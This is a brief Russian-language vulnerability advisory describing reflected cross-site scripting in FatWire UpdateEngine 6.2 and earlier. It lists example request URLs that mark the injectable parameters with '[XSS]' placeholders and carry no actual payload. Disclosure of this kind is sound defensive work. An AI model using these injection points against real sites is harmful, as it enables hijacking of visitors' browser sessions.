• Партнер

  • Программа: FatWire UpdateEngine 6.2 и более ранние версии

    Уязвимость позволяет удаленному пользователю произвести XSS нападение.
    Уязвимость существует из-за недостаточной обработки входных данных в параметрах
    "FUELAP_TEMPLATENAME", "EMAIL" и "COUNTRYNAME" в "UpdateEngine". Удаленный
    пользователь может с помощью специально сформированного запроса выполнить
    произвольный код сценария в браузере жертвы в контексте безопасности уязвимого
    сайта.

    Пример:

    /UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID= FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D66&ACTIVITY_ID=FWS5FWHITEPAPERS%5F1404733&
    COUNTRY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5F
    PAGE%5F1415379&FUELAP_TEMPLATENAME=[XSS]

    /UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=
    fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=
    [XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5F
    WHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELAP _SITEDBID=SITE%5F%2D66&

    /UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME =fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&
    EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=IN
    TSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHIT EPAPERS%5F1300483&COUNTRYNAME=[XSS]

    /UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_ TEMPLATENAME=[XSS]
     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии